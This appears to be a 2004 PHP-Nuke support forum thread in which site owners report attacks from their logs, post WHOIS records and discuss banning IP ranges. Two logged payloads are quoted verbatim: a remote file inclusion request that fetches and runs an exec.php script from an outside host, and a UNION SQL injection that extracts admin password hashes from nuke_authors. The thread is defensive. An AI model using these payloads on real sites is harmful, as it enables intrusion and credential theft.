PHP Web Host - Quality Web Hosting For All PHP Applications Free RavenNuke(tm) Add Ons
  Login or Register
 • Home • Downloads • Your Account • Forums • 

View next topic
View previous topic


Google
 
Web RavenPHPScripts (This Site)
Post new topic   Reply to topic
Author Message
stephen2417
Worker
Worker


Joined: Jan 18, 2004
Posts: 244
Location: Bristolville, OH

PostPosted: Wed Jun 02, 2004 12:05 am Reply with quote Back to top

Wow im supprised now.. I do beleive this is a fake thing to, thats what my friend told me.

Heres what they did..
/index.php?file=http://www.angelfire.com/linux/arplhmd/exec.php&cmd=id

Is that a valid hack.. Ill post their ip if you want too.
View user's profile Send private message Visit poster's website
Raven
Site Admin/Owner


Joined: Aug 27, 2002
Posts: 16987
Location: Kansas

PostPosted: Wed Jun 02, 2004 12:30 am Reply with quote Back to top

May be an attempt to steal your cookie. This is a very old exploit. Go ahead and post the IP. The kids from Brazil were using this many months ago.
View user's profile Send private message Visit poster's website AIM Address Yahoo Messenger
stephen2417
Worker
Worker


Joined: Jan 18, 2004
Posts: 244
Location: Bristolville, OH

PostPosted: Wed Jun 02, 2004 9:59 am Reply with quote Back to top

Yep is was them, dont be have the ability to ban ip ranges yet Wink

Who-Is for IP
200.227.112.48




OrgName: Latin American and Caribbean IP address Regional Registry
OrgID: LACNIC
Address: Potosi 1517
City: Montevideo
StateProv:
PostalCode: 11500
Country: UY

ReferralServer:
Only registered users can see links on this board!
Get registered or login to the forums!


NetRange: 200.0.0.0 - 200.255.255.255
CIDR: 200.0.0.0/8
NetName: LACNIC-200
NetHandle: NET-200-0-0-0-1
Parent:
NetType: Allocated to LACNIC
NameServer: NS.LACNIC.NET
NameServer: TINNIE.ARIN.NET
NameServer: NS-SEC.RIPE.NET
NameServer: SEC3.APNIC.NET
NameServer: NS2.DNS.BR
Comment: This IP address range is under LACNIC responsibility for further
Comment: allocations to users in LACNIC region.
Comment: Please see
Only registered users can see links on this board!
Get registered or login to the forums!
for further details, or check the
Comment: WHOIS server located at whois.lacnic.net
RegDate: 2002-07-27
Updated: 2004-03-18

TechHandle: LACNIC-ARIN
TechName: LACNIC Hostmaster
TechPhone: (+55) 11 5509-3522
TechEmail:
Only registered users can see links on this board!
Get registered or login to the forums!


OrgTechHandle: LACNIC-ARIN
OrgTechName: LACNIC Hostmaster
OrgTechPhone: (+55) 11 5509-3522
OrgTechEmail:
Only registered users can see links on this board!
Get registered or login to the forums!
View user's profile Send private message Visit poster's website
stephen2417
Worker
Worker


Joined: Jan 18, 2004
Posts: 244
Location: Bristolville, OH

PostPosted: Wed Jun 02, 2004 10:01 am Reply with quote Back to top

Oh and darn.. I frogot to turn the pc killer on...
View user's profile Send private message Visit poster's website
stephen2417
Worker
Worker


Joined: Jan 18, 2004
Posts: 244
Location: Bristolville, OH

PostPosted: Thu Jun 03, 2004 11:30 am Reply with quote Back to top

Raven I think that it would be a great idea for you to start a public shame list on your site. Mabye a module that everyone could add ip's to and get an sql dump to add right into sentinel.

Could that work?
View user's profile Send private message Visit poster's website
Raven
Site Admin/Owner


Joined: Aug 27, 2002
Posts: 16987
Location: Kansas

PostPosted: Thu Jun 03, 2004 11:38 am Reply with quote Back to top

If the majority of IP's were static then maybe. The thing is, most IP's, especially those being used by crackers, are either dhcp, forged, or proxied, and aren't worth much other than to report to the abuse links of the ISP that was used. In theory it sounds good but in practice I'm not sure it ultimately achieves the intended goal. But, never one to stifle creativity Smile Let's see what others have to say!
View user's profile Send private message Visit poster's website AIM Address Yahoo Messenger
squiresmk
Regular
Regular


Joined: May 31, 2004
Posts: 95
Location: NY

PostPosted: Thu Jun 03, 2004 12:16 pm Reply with quote Back to top

Might be useful in the wrong run. If duplicate IPs surfice in the list... have a running tally on the common ones then.
View user's profile Send private message Visit poster's website AIM Address Yahoo Messenger MSN Messenger ICQ Number
xfsunolesphp
Regular
Regular


Joined: Aug 23, 2003
Posts: 77

PostPosted: Thu Jun 03, 2004 12:34 pm Reply with quote Back to top

200.0.0 to 200.255.255 is leading Hacker IP. what these people teach to do? hacking?
View user's profile Send private message
stephen2417
Worker
Worker


Joined: Jan 18, 2004
Posts: 244
Location: Bristolville, OH

PostPosted: Thu Jun 03, 2004 12:50 pm Reply with quote Back to top

And 210.0.0 to 210.255.255 (thanks to bob for telling me that)
View user's profile Send private message Visit poster's website
GanjaUK
Life Cycles Becoming CPU Cycles


Joined: Feb 14, 2004
Posts: 633
Location: England

PostPosted: Thu Jun 03, 2004 1:09 pm Reply with quote Back to top

1 persons enemy might not be another's. Don't want those htaccess files getting over bulky. Smile
Mine is already huge... my htaccess is pretty big too. Laughing
View user's profile Send private message Visit poster's website
stephen2417
Worker
Worker


Joined: Jan 18, 2004
Posts: 244
Location: Bristolville, OH

PostPosted: Thu Jun 03, 2004 1:10 pm Reply with quote Back to top

Oh i dont even use the htaccess file bc my host dosent support it.. but im sure when i move to raven's hosting in october ill use it Wink
View user's profile Send private message Visit poster's website
SmackDaddy
Involved
Involved


Joined: Jun 02, 2004
Posts: 268
Location: Englewood, OH

PostPosted: Fri Jun 04, 2004 6:30 am Reply with quote Back to top

stephen2417 wrote:
Yep is was them, dont be have the ability to ban ip ranges yet Wink

Who-Is for IP
200.227.112.48



I think they said you could put in 200.0.0.0 and that would block the entire IP range.....with 1.2.0, I think it might even accept 200.*.*.* .... someone correct me if I am wrong tho.....
View user's profile Send private message Send e-mail Visit poster's website
Raven
Site Admin/Owner


Joined: Aug 27, 2002
Posts: 16987
Location: Kansas

PostPosted: Fri Jun 04, 2004 6:43 am Reply with quote Back to top

It has always had the ability to ban at any level of octet. And with v1.2 either 200.*.*.* or 200.0.0.0 will work.
View user's profile Send private message Visit poster's website AIM Address Yahoo Messenger
stephen2417
Worker
Worker


Joined: Jan 18, 2004
Posts: 244
Location: Bristolville, OH

PostPosted: Fri Jun 04, 2004 1:32 pm Reply with quote Back to top

Why must hackers be so dumb.. Yet another silly silly mistake. They did a union on my downloads and i dont even have them active.. I mean HELLO...
Query String: /modules.php?name=Downloads&d_op=viewsdownload&sid=-1/**/UNION/**/SELECT/**/0,0,aid,pwd,0,0,0,0,0,0,0,0/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/*

Who-Is for IP
202.156.229.91




OrgName: Asia Pacific Network Information Centre
OrgID: APNIC
Address: PO Box 2131
City: Milton
StateProv: QLD
PostalCode: 4064
Country: AU

ReferralServer:
Only registered users can see links on this board!
Get registered or login to the forums!


NetRange: 202.0.0.0 - 203.255.255.255
CIDR: 202.0.0.0/7
NetName: APNIC-CIDR-BLK
NetHandle: NET-202-0-0-0-1
Parent:
NetType: Allocated to APNIC
NameServer: NS1.APNIC.NET
NameServer: NS3.APNIC.NET
NameServer: NS4.APNIC.NET
NameServer: TINNIE.ARIN.NET
NameServer: NS.RIPE.NET
NameServer: DNS1.TELSTRA.NET
Comment: This IP address range is not registered in the ARIN database.
Comment: For details, refer to the APNIC Whois Database via
Comment: WHOIS.APNIC.NET or
Only registered users can see links on this board!
Get registered or login to the forums!

Comment: ** IMPORTANT NOTE: APNIC is the Regional Internet Registry
Comment: for the Asia Pacific region. APNIC does not operate networks
Comment: using this IP address range and is not able to investigate
Comment: spam or abuse reports relating to these addresses. For more
Comment: help, refer to
Only registered users can see links on this board!
Get registered or login to the forums!

Comment:
RegDate: 1994-04-05
Updated: 2004-03-30

OrgTechHandle: AWC12-ARIN
OrgTechName: APNIC Whois Contact
OrgTechPhone: +61 7 3858 3100
OrgTechEmail:
Only registered users can see links on this board!
Get registered or login to the forums!



Dont worry they missed the banner on my home page im sure they understand what Sentinel(tm) Protected means now. They are burning in hell along with popups of death Twisted Evil Twisted Evil Twisted Evil (Sorry am i evil?)
View user's profile Send private message Visit poster's website
Display posts from previous:       
Post new topic   Reply to topic

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
Forums ©
 

All logos and trademarks in this site are property of their respective owner.
The comments are property of their posters, all the rest © 2002-2011 by Raven

You can syndicate our news using the file xml

CSE HTML Validator Helped Clean up This Page! [Valid RSS] valid RSS 2.0 Valid robots.txt Stop Spam Harvesters, Join Project Honey Pot

Website engines core code is © copyright by PHP-Nuke but has been heavily patched and modified by myself and others.
PHP-Nuke is a free software released under the GNU/GPL.


:: fisubice phpbb2 style by Daz :: PHP-Nuke theme by www.nukemods.com ::
:: fisubice Theme Modified by the RavenNuke™ Team ::

:: W3C CSS Compliance Validation :: W3C HTML 4.01 Transitional Compliance Validation ::

zerosum